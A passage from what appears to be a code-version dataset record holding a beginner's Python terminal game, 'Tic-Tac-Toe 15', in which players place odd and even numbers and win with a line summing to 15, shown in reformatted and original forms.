player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. 
'\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p1_num_input in even_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n if turn == player2:\n print('\\nIts your turn', player2 + ': ')\n print()\n p2_move_input = int(input('Move to which space? 
(1-9): '))\n if player_order[0] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p2_num_input in odd_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p2_num_input in even_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. 
'\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n except ValueError:\n print('\\nINVALID INPUT, Please try again and enter only in integers. ')\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n\n\ndef check_game(board, winner):\n is_game_over = ''\n if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[1]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4\n ] != 0 and board[5] != 0:\n print_board(board)\n print('\\n' + str(board[3]) + ',', str(board[4]) + ',', 'and', str(\n board[5]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[7]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3\n ] != 0 and board[6] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[3]) + ',', 'and', str(\n board[6]), 'add up to 15! ')\n print('\\n' + winner, 'wins! 
')\n is_game_over = True\n elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4\n ] != 0 and board[7] != 0:\n print_board(board)\n print('\\n' + str(board[1]) + ',', str(board[4]) + ',', 'and', str(\n board[7]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[2]) + ',', str(board[5]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[4]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[4]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! 
')\n is_game_over = True\n return is_game_over\n\n\ndef score(score1, score2, player1, player2):\n print('\\n\\t------------------')\n print('\\t SCOREBOARD')\n print('\\t------------------')\n print('\\t' + ' ' + player1 + ':', score1)\n print('\\t' + ' ' + player2 + ':', score2)\n print('\\t------------------')\n print()\n\n\ndef play_game(score1, score2, player1, player2):\n unavailable_moves_p1 = []\n unavailable_moves_p2 = []\n player_order = []\n the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n count = 0\n restart = ''\n turn = choose_who_first(player1, player2, player_order)\n input('Enter anything to start the round: ')\n for i in range(10):\n print_board(the_board)\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n count += 1\n if check_game(the_board, turn):\n if turn == player1:\n score1 += 1\n elif turn == player2:\n score2 += 1\n break\n if count == 9:\n print(\"No numbers added up to 15, it's a DRAW! \")\n break\n if turn == player1:\n turn = player2\n else:\n turn = player1\n input('\\nEnter anything to continue: ')\n score(score1, score2, player1, player2)\n while (restart != 'yes' or restart != 'y' or restart != 'n' or restart !=\n 'no'):\n restart = input('Do want to play Again? (y/n) ').lower()\n if restart == 'y' or restart == 'yes':\n print('\\nLoading new round...')\n play_game(score1, score2, player1, player2)\n elif restart == 'n' or restart == 'no':\n if score1 > score2:\n print('\\n' + player1, 'is the overall winner! Congratulations!'\n )\n elif score2 > score1:\n print('\\n' + player2, 'is the overall winner! Congratulations!'\n )\n elif score1 == score2:\n print(\n \"\\nBoth players have one the same amount of rounds. It's a draw! \"\n )\n print('\\nThanks for playing! 
')\n break\n else:\n print('\\nPlease enter YES or NO ')\n print()\n\n\nif __name__ == '__main__':\n intro()\n input('Enter anything to continue: ')\n print('\\nEnter usernames: ')\n name1 = input('\\nPlayer 1, Enter your name: ').title()\n name2 = input('\\nPlayer 2, Enter your name: ').title()\n p1_score = 0\n p2_score = 0\n play_game(p1_score, p2_score, name1, name2)\n",
"step-4": "import random\n\n\ndef intro():\n print(\n \"\"\"\n####### ####### ####### # ####### \n # # #### # ## #### # #### ###### ## # \n # # # # # # # # # # # # # # # # \n # # # ##### # # # # ##### # # # ##### # ###### \n # # # # ###### # # # # # # # \n # # # # # # # # # # # # # # # # \n # # #### # # # #### # #### ###### ##### ##### \n\nHow to play Tic-Tac-Toe 15: \n\nTo win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers. \n\nBoard Instructions: Tell the program the position of which you would like to enter by entering the number position of \nthe boxes as shown below. Players can can only enter from numbers from 1-9. \n\n | |\n\t 1 | 2 | 3\n\t_____|_____|_____\n\t | |\n\t 4 | 5 | 6\n\t_____|_____|_____\n\t | |\n\t 7 | 8 | 9\n\t | |\n \"\"\"\n )\n\n\ndef print_board(board):\n print('\\n\\t | |')\n print('\\t {} | {} | {}'.format(board[0], board[1], board[2]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[3], board[4], board[5]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[6], board[7], board[8]))\n print('\\t | |')\n\n\ndef choose_who_first(player1, player2, player_order):\n flip = random.randint(1, 2)\n if flip == 1:\n print('\\n' + player1, 'goes first.', player1,\n 'can only play odd numbers and', player2,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player1)\n player_order.append(player2)\n return player1\n elif flip == 2:\n print('\\n' + player2, 'goes first.', player2,\n 'can only play odd numbers and', name1,\n 'can only play even numbers from 1-9. 
')\n print()\n player_order.append(player2)\n player_order.append(player1)\n return player2\n\n\ndef make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order):\n odd_moves = [1, 3, 5, 7, 9]\n even_moves = [2, 4, 6, 8]\n try:\n if turn == player1:\n print('\\nIts your turn', player1 + ': ')\n print()\n p1_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p1_num_input in odd_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. 
'\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p1_num_input in even_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n if turn == player2:\n print('\\nIts your turn', player2 + ': ')\n print()\n p2_move_input = int(input('Move to which space? 
(1-9): '))\n if player_order[0] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p2_num_input in odd_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p2_num_input in even_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. 
'\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n except ValueError:\n print('\\nINVALID INPUT, Please try again and enter only in integers. ')\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n\n\ndef check_game(board, winner):\n is_game_over = ''\n if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[1]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4\n ] != 0 and board[5] != 0:\n print_board(board)\n print('\\n' + str(board[3]) + ',', str(board[4]) + ',', 'and', str(\n board[5]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[7]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3\n ] != 0 and board[6] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[3]) + ',', 'and', str(\n board[6]), 'add up to 15! ')\n print('\\n' + winner, 'wins! 
')\n is_game_over = True\n elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4\n ] != 0 and board[7] != 0:\n print_board(board)\n print('\\n' + str(board[1]) + ',', str(board[4]) + ',', 'and', str(\n board[7]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[2]) + ',', str(board[5]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[4]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[4]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! 
')\n is_game_over = True\n return is_game_over\n\n\ndef score(score1, score2, player1, player2):\n print('\\n\\t------------------')\n print('\\t SCOREBOARD')\n print('\\t------------------')\n print('\\t' + ' ' + player1 + ':', score1)\n print('\\t' + ' ' + player2 + ':', score2)\n print('\\t------------------')\n print()\n\n\ndef play_game(score1, score2, player1, player2):\n unavailable_moves_p1 = []\n unavailable_moves_p2 = []\n player_order = []\n the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n count = 0\n restart = ''\n turn = choose_who_first(player1, player2, player_order)\n input('Enter anything to start the round: ')\n for i in range(10):\n print_board(the_board)\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n count += 1\n if check_game(the_board, turn):\n if turn == player1:\n score1 += 1\n elif turn == player2:\n score2 += 1\n break\n if count == 9:\n print(\"No numbers added up to 15, it's a DRAW! \")\n break\n if turn == player1:\n turn = player2\n else:\n turn = player1\n input('\\nEnter anything to continue: ')\n score(score1, score2, player1, player2)\n while (restart != 'yes' or restart != 'y' or restart != 'n' or restart !=\n 'no'):\n restart = input('Do want to play Again? (y/n) ').lower()\n if restart == 'y' or restart == 'yes':\n print('\\nLoading new round...')\n play_game(score1, score2, player1, player2)\n elif restart == 'n' or restart == 'no':\n if score1 > score2:\n print('\\n' + player1, 'is the overall winner! Congratulations!'\n )\n elif score2 > score1:\n print('\\n' + player2, 'is the overall winner! Congratulations!'\n )\n elif score1 == score2:\n print(\n \"\\nBoth players have one the same amount of rounds. It's a draw! \"\n )\n print('\\nThanks for playing! 
')\n break\n else:\n print('\\nPlease enter YES or NO ')\n print()\n\n\nif __name__ == '__main__':\n intro()\n input('Enter anything to continue: ')\n print('\\nEnter usernames: ')\n name1 = input('\\nPlayer 1, Enter your name: ').title()\n name2 = input('\\nPlayer 2, Enter your name: ').title()\n p1_score = 0\n p2_score = 0\n play_game(p1_score, p2_score, name1, name2)\n",
"step-5": "# Name: Calvin Liew\r\n# Date: 2021-01-29\r\n# Purpose: Video game final project, Tic-Tac-Toe 15 by Calvin Liew.\r\n\r\nimport random\r\n\r\n\r\n# Function that reminds the users of the game rules and other instructions.\r\n\r\ndef intro():\r\n print(\"\"\"\\n####### ####### ####### # ####### \r\n # # #### # ## #### # #### ###### ## # \r\n # # # # # # # # # # # # # # # # \r\n # # # ##### # # # # ##### # # # ##### # ###### \r\n # # # # ###### # # # # # # # \r\n # # # # # # # # # # # # # # # # \r\n # # #### # # # #### # #### ###### ##### ##### \r\n\r\nHow to play Tic-Tac-Toe 15: \r\n\r\nTo win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers. \r\n\r\nBoard Instructions: Tell the program the position of which you would like to enter by entering the number position of \r\nthe boxes as shown below. Players can can only enter from numbers from 1-9. \r\n\r\n | |\r\n\t 1 | 2 | 3\r\n\t_____|_____|_____\r\n\t | |\r\n\t 4 | 5 | 6\r\n\t_____|_____|_____\r\n\t | |\r\n\t 7 | 8 | 9\r\n\t | |\r\n \"\"\")\r\n\r\n\r\n# Function that prints the tic-tac-toe board.\r\n\r\ndef print_board(board):\r\n print(\"\\n\\t | |\")\r\n print(\"\\t {} | {} | {}\".format(board[0], board[1], board[2]))\r\n print('\\t_____|_____|_____')\r\n\r\n print(\"\\t | |\")\r\n print(\"\\t {} | {} | {}\".format(board[3], board[4], board[5]))\r\n print('\\t_____|_____|_____')\r\n\r\n print(\"\\t | |\")\r\n\r\n print(\"\\t {} | {} | {}\".format(board[6], board[7], board[8]))\r\n print(\"\\t | |\")\r\n\r\n\r\n# Function that chooses who goes first and assigns the player order.\r\n\r\ndef choose_who_first(player1, player2, player_order):\r\n flip = random.randint(1, 2)\r\n\r\n if flip == 1:\r\n print(\"\\n\" + player1, \"goes first.\", player1, \"can only play odd numbers and\", player2,\r\n \"can only play even numbers from 1-9. 
\")\r\n print()\r\n player_order.append(player1)\r\n player_order.append(player2)\r\n return player1\r\n\r\n elif flip == 2:\r\n print(\"\\n\" + player2, \"goes first.\", player2, \"can only play odd numbers and\", name1,\r\n \"can only play even numbers from 1-9. \")\r\n print()\r\n player_order.append(player2)\r\n player_order.append(player1)\r\n return player2\r\n\r\n\r\n# Function that calls the print_board() function as well as makes the moves that the players provide while checking if the moves are legal or not.\r\n\r\ndef make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order):\r\n odd_moves = [1, 3, 5, 7, 9]\r\n even_moves = [2, 4, 6, 8]\r\n\r\n try:\r\n if turn == player1:\r\n\r\n print(\"\\nIts your turn\", player1 + \": \")\r\n print()\r\n p1_move_input = int(input(\"Move to which space? (1-9): \"))\r\n\r\n if player_order[0] == player1:\r\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1] == 0:\r\n print()\r\n p1_num_input = int(input(\"Enter an ODD NUMBER from 1-9: \"))\r\n\r\n if p1_num_input in odd_moves and p1_num_input not in unavailable_moves_p1:\r\n the_board[p1_move_input - 1] = p1_num_input\r\n unavailable_moves_p1.append(p1_num_input)\r\n elif p1_num_input in unavailable_moves_p1:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number that you haven't used. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter an ODD number. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n elif p1_move_input < 1 or p1_move_input > 9:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number between 1-9. 
\")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter an unoccupied spot. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n\r\n elif player_order[1] == player1:\r\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1] == 0:\r\n print()\r\n p1_num_input = int(input(\"Enter a EVEN NUMBER from 1-9: \"))\r\n\r\n if p1_num_input in even_moves and p1_num_input not in unavailable_moves_p1:\r\n the_board[p1_move_input - 1] = p1_num_input\r\n unavailable_moves_p1.append(p1_num_input)\r\n elif p1_num_input in unavailable_moves_p1:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number that you haven't used. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter a EVEN number. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n elif p1_move_input < 1 or p1_move_input > 9:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number between 1-9. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter an unoccupied spot. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n\r\n if turn == player2:\r\n\r\n print(\"\\nIts your turn\", player2 + \": \")\r\n print()\r\n p2_move_input = int(input(\"Move to which space? 
(1-9): \"))\r\n\r\n if player_order[0] == player2:\r\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1] == 0:\r\n print()\r\n p2_num_input = int(input(\"Enter an ODD NUMBER from 1-9: \"))\r\n\r\n if p2_num_input in odd_moves and p2_num_input not in unavailable_moves_p2:\r\n the_board[p2_move_input - 1] = p2_num_input\r\n unavailable_moves_p2.append(p2_num_input)\r\n elif p2_num_input in unavailable_moves_p2:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number that you haven't used. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter an ODD number. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n elif p2_move_input < 1 or p2_move_input > 9:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number between 1-9. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter an unoccupied spot. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n\r\n elif player_order[1] == player2:\r\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1] == 0:\r\n print()\r\n p2_num_input = int(input(\"Enter a EVEN NUMBER from 1-9: \"))\r\n\r\n if p2_num_input in even_moves and p2_num_input not in unavailable_moves_p2:\r\n the_board[p2_move_input - 1] = p2_num_input\r\n unavailable_moves_p2.append(p2_num_input)\r\n elif p2_num_input in unavailable_moves_p2:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number that you haven't used. 
\")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter a EVEN number. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n elif p2_move_input < 1 or p2_move_input > 9:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number between 1-9. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID, Please try again and enter an unoccupied spot. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n\r\n except ValueError:\r\n print(\"\\nINVALID INPUT, Please try again and enter only in integers. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n\r\n\r\n# Function that checks if any three numbers in a row/column/diagonal add up to 15. If there is, the function returns is_game_over and the game ends.\r\n\r\ndef check_game(board, winner):\r\n is_game_over = \"\"\r\n\r\n if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1] != 0 and board[2] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[0])+\",\", str(board[1])+\",\", \"and\", str(board[2]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4] != 0 and board[5] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[3])+\",\", str(board[4])+\",\", \"and\", str(board[5]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! 
\")\r\n is_game_over = True\r\n elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7] != 0 and board[8] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[6])+\",\", str(board[7])+\",\", \"and\", str(board[8]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3] != 0 and board[6] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[0])+\",\", str(board[3])+\",\", \"and\", str(board[6]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4] != 0 and board[7] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[1])+\",\", str(board[4])+\",\", \"and\", str(board[7]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5] != 0 and board[8] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[2])+\",\", str(board[5])+\",\", \"and\", str(board[8]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4] != 0 and board[2] != 0:\r\n 